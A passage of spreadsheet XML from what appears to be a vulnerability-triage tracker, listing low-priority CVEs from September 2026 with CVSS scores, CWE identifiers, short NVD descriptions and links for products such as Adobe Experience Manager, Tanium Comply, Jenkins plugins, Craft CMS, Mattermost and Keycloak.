      <c r="E1159" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1159" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1159" s="5" t="inlineStr"/>
      <c r="H1159" s="5" t="inlineStr"/>
      <c r="I1159" s="5" t="inlineStr"/>
      <c r="J1159" s="5" t="inlineStr"/>
      <c r="K1159" s="5" t="inlineStr"/>
      <c r="L1159" s="5" t="inlineStr"/>
      <c r="M1159" s="5" t="inlineStr"/>
      <c r="N1159" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1159" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1159" s="5" t="inlineStr"/>
      <c r="Q1159" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1159" s="5" t="inlineStr">
        <is>
          <t>Adobe Experience Manager is affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed.</t>
        </is>
      </c>
      <c r="S1159" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84397</t>
        </is>
      </c>
    </row>
    <row r="1160">
      <c r="A1160" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1160" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1160" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87025</t>
        </is>
      </c>
      <c r="D1160" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E1160" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1160" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G1160" s="5" t="inlineStr"/>
      <c r="H1160" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1160" s="5" t="inlineStr"/>
      <c r="J1160" s="5" t="inlineStr"/>
      <c r="K1160" s="5" t="inlineStr">
        <is>
          <t>tanium:comply</t>
        </is>
      </c>
      <c r="L1160" s="5" t="inlineStr"/>
      <c r="M1160" s="5" t="inlineStr"/>
      <c r="N1160" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1160" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1160" s="5" t="inlineStr"/>
      <c r="Q1160" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R1160" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed an improper access controls vulnerability in Comply.</t>
        </is>
      </c>
      <c r="S1160" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87025</t>
        </is>
      </c>
    </row>
    <row r="1161">
      <c r="A1161" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1161" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1161" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87033</t>
        </is>
      </c>
      <c r="D1161" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E1161" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1161" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G1161" s="5" t="inlineStr"/>
      <c r="H1161" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1161" s="5" t="inlineStr"/>
      <c r="J1161" s="5" t="inlineStr"/>
      <c r="K1161" s="5" t="inlineStr">
        <is>
          <t>tanium:comply</t>
        </is>
      </c>
      <c r="L1161" s="5" t="inlineStr"/>
      <c r="M1161" s="5" t="inlineStr"/>
      <c r="N1161" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1161" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1161" s="5" t="inlineStr"/>
      <c r="Q1161" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R1161" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed an improper access controls vulnerability in Comply.</t>
        </is>
      </c>
      <c r="S1161" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87033</t>
        </is>
      </c>
    </row>
    <row r="1162">
      <c r="A1162" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1162" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1162" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87037</t>
        </is>
      </c>
      <c r="D1162" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E1162" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1162" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G1162" s="5" t="inlineStr"/>
      <c r="H1162" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1162" s="5" t="inlineStr"/>
      <c r="J1162" s="5" t="inlineStr"/>
      <c r="K1162" s="5" t="inlineStr">
        <is>
          <t>tanium:comply</t>
        </is>
      </c>
      <c r="L1162" s="5" t="inlineStr"/>
      <c r="M1162" s="5" t="inlineStr"/>
      <c r="N1162" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1162" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1162" s="5" t="inlineStr"/>
      <c r="Q1162" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1162" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed an improper access controls vulnerability in Comply.</t>
        </is>
      </c>
      <c r="S1162" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87037</t>
        </is>
      </c>
    </row>
    <row r="1163">
      <c r="A1163" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1163" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1163" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87048</t>
        </is>
      </c>
      <c r="D1163" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E1163" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1163" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G1163" s="5" t="inlineStr"/>
      <c r="H1163" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1163" s="5" t="inlineStr"/>
      <c r="J1163" s="5" t="inlineStr"/>
      <c r="K1163" s="5" t="inlineStr">
        <is>
          <t>tanium:comply</t>
        </is>
      </c>
      <c r="L1163" s="5" t="inlineStr"/>
      <c r="M1163" s="5" t="inlineStr"/>
      <c r="N1163" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1163" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1163" s="5" t="inlineStr"/>
      <c r="Q1163" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1163" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed an improper access controls vulnerability in Comply.</t>
        </is>
      </c>
      <c r="S1163" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87048</t>
        </is>
      </c>
    </row>
    <row r="1164">
      <c r="A1164" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1164" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1164" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89031</t>
        </is>
      </c>
      <c r="D1164" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E1164" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1164" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1164" s="5" t="inlineStr"/>
      <c r="H1164" s="5" t="inlineStr"/>
      <c r="I1164" s="5" t="inlineStr"/>
      <c r="J1164" s="5" t="inlineStr"/>
      <c r="K1164" s="5" t="inlineStr"/>
      <c r="L1164" s="5" t="inlineStr"/>
      <c r="M1164" s="5" t="inlineStr"/>
      <c r="N1164" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1164" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1164" s="5" t="inlineStr"/>
      <c r="Q1164" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R1164" s="5" t="inlineStr">
        <is>
          <t>Adenion Blog2Social plugin for WordPress before 9.1.0 allows low-privileged users to modify the scheduled post records of other users. The b2s_calendar_move_post AJAX handler in includes/Ajax/Post.php issues an UPDATE against the b2s_posts table using only the attacker-supplied b2s_id primary key with no blog_user_id ownership constraint, allowing any user with the edit_posts capability to reschedule, suppress, or alter the publication state of any other user's scheduled social media post.</t>
        </is>
      </c>
      <c r="S1164" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89031</t>
        </is>
      </c>
    </row>
    <row r="1165">
      <c r="A1165" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1165" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1165" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91021</t>
        </is>
      </c>
      <c r="D1165" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E1165" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1165" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1165" s="5" t="inlineStr"/>
      <c r="H1165" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1165" s="5" t="inlineStr"/>
      <c r="J1165" s="5" t="inlineStr"/>
      <c r="K1165" s="5" t="inlineStr"/>
      <c r="L1165" s="5" t="inlineStr"/>
      <c r="M1165" s="5" t="inlineStr"/>
      <c r="N1165" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1165" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1165" s="5" t="inlineStr"/>
      <c r="Q1165" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1165" s="5" t="inlineStr">
        <is>
          <t>Trilium Notes, version v0.103.0 and earlier, contains a stored cross-site scripting (XSS) vulnerability in the share renderer for webView notes due to improper HTML escaping of user-controlled #webViewSrc values. This vulnerability allows attackers with note-authoring privileges to inject arbitrary JavaScript that executes for any user who opens the shared note, including administrators.</t>
        </is>
      </c>
      <c r="S1165" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91021</t>
        </is>
      </c>
    </row>
    <row r="1166">
      <c r="A1166" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1166" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1166" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92132</t>
        </is>
      </c>
      <c r="D1166" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E1166" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1166" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1166" s="5" t="inlineStr"/>
      <c r="H1166" s="5" t="inlineStr"/>
      <c r="I1166" s="5" t="inlineStr"/>
      <c r="J1166" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="K1166" s="5" t="inlineStr"/>
      <c r="L1166" s="5" t="inlineStr"/>
      <c r="M1166" s="5" t="inlineStr"/>
      <c r="N1166" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1166" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1166" s="5" t="inlineStr"/>
      <c r="Q1166" s="5" t="inlineStr">
        <is>
          <t>CWE-74</t>
        </is>
      </c>
      <c r="R1166" s="5" t="inlineStr">
        <is>
          <t>Jenkins Gradle Plugin 2.19.1252.v15196b_5a_6e10 and earlier requests build scan data from the build scan link detected in the build log, even when a Develocity server URL is configured in the global configuration, allowing attackers able to control the build log to capture the Develocity access key configured in the global configuration by having Jenkins connect to an attacker-specified URL.</t>
        </is>
      </c>
      <c r="S1166" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92132</t>
        </is>
      </c>
    </row>
    <row r="1167">
      <c r="A1167" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1167" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1167" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92133</t>
        </is>
      </c>
      <c r="D1167" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E1167" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1167" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1167" s="5" t="inlineStr"/>
      <c r="H1167" s="5" t="inlineStr"/>
      <c r="I1167" s="5" t="inlineStr"/>
      <c r="J1167" s="5" t="inlineStr">
        <is>
          <t>jenkins, gitlab</t>
        </is>
      </c>
      <c r="K1167" s="5" t="inlineStr"/>
      <c r="L1167" s="5" t="inlineStr"/>
      <c r="M1167" s="5" t="inlineStr"/>
      <c r="N1167" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1167" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1167" s="5" t="inlineStr"/>
      <c r="Q1167" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="R1167" s="5" t="inlineStr">
        <is>
          <t>Jenkins GitLab Plugin 1.2149.vcfc32c82b_f7f and earlier caches the GitLab API client built for alternative GitLab API token credentials under a cache key derived from the credentials ID alone, omitting the folder in which the credentials are resolved, allowing attackers with Item/Configure permission to access GitLab API token credentials they are not entitled to use.</t>
        </is>
      </c>
      <c r="S1167" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92133</t>
        </is>
      </c>
    </row>
    <row r="1168">
      <c r="A1168" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1168" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1168" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92579</t>
        </is>
      </c>
      <c r="D1168" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E1168" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1168" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1168" s="5" t="inlineStr"/>
      <c r="H1168" s="5" t="inlineStr"/>
      <c r="I1168" s="5" t="inlineStr"/>
      <c r="J1168" s="5" t="inlineStr"/>
      <c r="K1168" s="5" t="inlineStr"/>
      <c r="L1168" s="5" t="inlineStr"/>
      <c r="M1168" s="5" t="inlineStr"/>
      <c r="N1168" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1168" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1168" s="5" t="inlineStr"/>
      <c r="Q1168" s="5" t="inlineStr">
        <is>
          <t>CWE-289</t>
        </is>
      </c>
      <c r="R1168" s="5" t="inlineStr">
        <is>
          <t>In AVideo through 29.0, the autoCSRFGuard() function maintains a hardcoded allowlist of exempt basenames tested without directory context, allowing plugin files matching core filenames to inherit CSRF exemptions. The LoginWordPress plugin file login.json.php inherits an exemption and unconditionally logs out authenticated users on cross-site POST requests before validating credentials.</t>
        </is>
      </c>
      <c r="S1168" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92579</t>
        </is>
      </c>
    </row>
    <row r="1169">
      <c r="A1169" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1169" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1169" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92590</t>
        </is>
      </c>
      <c r="D1169" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E1169" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1169" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1169" s="5" t="inlineStr"/>
      <c r="H1169" s="5" t="inlineStr"/>
      <c r="I1169" s="5" t="inlineStr"/>
      <c r="J1169" s="5" t="inlineStr"/>
      <c r="K1169" s="5" t="inlineStr"/>
      <c r="L1169" s="5" t="inlineStr"/>
      <c r="M1169" s="5" t="inlineStr"/>
      <c r="N1169" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1169" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1169" s="5" t="inlineStr"/>
      <c r="Q1169" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1169" s="5" t="inlineStr">
        <is>
          <t>Craft CMS versions from 5.7.0 before 5.10.13 contain a stored cross-site scripting vulnerability in the Generated Fields feature that disables Twig autoescaping and fails to encode cached values. Content editors can inject malicious JavaScript through editable fields that executes in authenticated Control Panel sessions of higher-privileged users viewing element indexes.</t>
        </is>
      </c>
      <c r="S1169" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92590</t>
        </is>
      </c>
    </row>
    <row r="1170">
      <c r="A1170" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1170" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1170" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92778</t>
        </is>
      </c>
      <c r="D1170" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E1170" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1170" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1170" s="5" t="inlineStr"/>
      <c r="H1170" s="5" t="inlineStr"/>
      <c r="I1170" s="5" t="inlineStr"/>
      <c r="J1170" s="5" t="inlineStr"/>
      <c r="K1170" s="5" t="inlineStr"/>
      <c r="L1170" s="5" t="inlineStr"/>
      <c r="M1170" s="5" t="inlineStr"/>
      <c r="N1170" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1170" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1170" s="5" t="inlineStr"/>
      <c r="Q1170" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="R1170" s="5" t="inlineStr">
        <is>
          <t>CMAK through 3.0.0.6 fails to apply the scheduled leader election feature toggle to HTML form routes, allowing attackers to bypass the feature gate. Attackers can access the form endpoints to start and stop the recurring election scheduler, disrupting leadership across managed Kafka clusters.</t>
        </is>
      </c>
      <c r="S1170" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92778</t>
        </is>
      </c>
    </row>
    <row r="1171">
      <c r="A1171" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1171" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1171" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-10556</t>
        </is>
      </c>
      <c r="D1171" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1171" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1171" s="5" t="inlineStr">
        <is>
          <t>responsibledisclosure@mattermost.com</t>
        </is>
      </c>
      <c r="G1171" s="5" t="inlineStr"/>
      <c r="H1171" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1171" s="5" t="inlineStr"/>
      <c r="J1171" s="5" t="inlineStr"/>
      <c r="K1171" s="5" t="inlineStr"/>
      <c r="L1171" s="5" t="inlineStr"/>
      <c r="M1171" s="5" t="inlineStr"/>
      <c r="N1171" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1171" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1171" s="5" t="inlineStr"/>
      <c r="Q1171" s="5" t="inlineStr">
        <is>
          <t>CWE-754</t>
        </is>
      </c>
      <c r="R1171" s="5" t="inlineStr">
        <is>
          <t>Mattermost versions 11.9.x &lt;= 11.9.0, 11.8.x &lt;= 11.8.4, 11.7.x &lt;= 11.7.7, 10.11.x &lt;= 10.11.22 fail to validate null entries in Microsoft Graph webhook notification payloads, which allows an unauthenticated attacker to crash the Microsoft Calendar plugin process and deny calendar integration service to all users on the instance via a crafted {{POST}} request to the public webhook endpoint.. Mattermost Advisory ID: MMSA-2026-00693</t>
        </is>
      </c>
      <c r="S1171" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-10556</t>
        </is>
      </c>
    </row>
    <row r="1172">
      <c r="A1172" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1172" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1172" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-11984</t>
        </is>
      </c>
      <c r="D1172" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1172" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1172" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G1172" s="5" t="inlineStr"/>
      <c r="H1172" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1172" s="5" t="inlineStr"/>
      <c r="J1172" s="5" t="inlineStr"/>
      <c r="K1172" s="5" t="inlineStr"/>
      <c r="L1172" s="5" t="inlineStr"/>
      <c r="M1172" s="5" t="inlineStr"/>
      <c r="N1172" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1172" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1172" s="5" t="inlineStr"/>
      <c r="Q1172" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1172" s="5" t="inlineStr">
        <is>
          <t>The Ad Inserter – Ad Manager &amp; AdSense Ads plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 2.8.16 due to a missing capability check on the `ai-debug-code` URL-parameter. This makes it possible for unauthenticated attackers to view administrator-configured header and footer code blocks that have been disabled from public display.</t>
        </is>
      </c>
      <c r="S1172" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-11984</t>
        </is>
      </c>
    </row>
    <row r="1173">
      <c r="A1173" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1173" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1173" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16188</t>
        </is>
      </c>
      <c r="D1173" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1173" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1173" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G1173" s="5" t="inlineStr"/>
      <c r="H1173" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1173" s="5" t="inlineStr"/>
      <c r="J1173" s="5" t="inlineStr"/>
      <c r="K1173" s="5" t="inlineStr"/>
      <c r="L1173" s="5" t="inlineStr"/>
      <c r="M1173" s="5" t="inlineStr"/>
      <c r="N1173" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1173" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1173" s="5" t="inlineStr"/>
      <c r="Q1173" s="5" t="inlineStr">
        <is>
          <t>CWE-117</t>
        </is>
      </c>
      <c r="R1173" s="5" t="inlineStr">
        <is>
          <t>IBM WebSphere Application Server 9.0, and 8.5 could allow a remote attacker to inject forged log entries into the server's administrative log.</t>
        </is>
      </c>
      <c r="S1173" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16188</t>
        </is>
      </c>
    </row>
    <row r="1174">
      <c r="A1174" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1174" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1174" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18065</t>
        </is>
      </c>
      <c r="D1174" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1174" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1174" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G1174" s="5" t="inlineStr"/>
      <c r="H1174" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1174" s="5" t="inlineStr"/>
      <c r="J1174" s="5" t="inlineStr"/>
      <c r="K1174" s="5" t="inlineStr"/>
      <c r="L1174" s="5" t="inlineStr"/>
      <c r="M1174" s="5" t="inlineStr"/>
      <c r="N1174" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1174" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1174" s="5" t="inlineStr"/>
      <c r="Q1174" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="R1174" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a remote unauthenticated attacker to gain access to sensitive information through session IP binding bypass in Navigator for i.</t>
        </is>
      </c>
      <c r="S1174" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18065</t>
        </is>
      </c>
    </row>
    <row r="1175">
      <c r="A1175" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1175" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1175" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19607</t>
        </is>
      </c>
      <c r="D1175" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1175" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1175" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G1175" s="5" t="inlineStr"/>
      <c r="H1175" s="5" t="inlineStr"/>
      <c r="I1175" s="5" t="inlineStr"/>
      <c r="J1175" s="5" t="inlineStr">
        <is>
          <t>keycloak</t>
        </is>
      </c>
      <c r="K1175" s="5" t="inlineStr"/>
      <c r="L1175" s="5" t="inlineStr"/>
      <c r="M1175" s="5" t="inlineStr"/>
      <c r="N1175" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1175" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1175" s="5" t="inlineStr"/>
      <c r="Q1175" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R1175" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the first-broker-login flow of the keycloak-services component. This component handles the initial authentication and account linking when a user logs in via an external identity provider. The issue allows an attacker to register a matching username on an external provider to trigger a collision in Keycloak, which results in the legitimate user being locked out of their account.</t>
        </is>
      </c>
      <c r="S1175" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19607</t>
        </is>
      </c>
    </row>
    <row r="1176">
      <c r="A1176" s="5" t="inlineStr">
        <is>
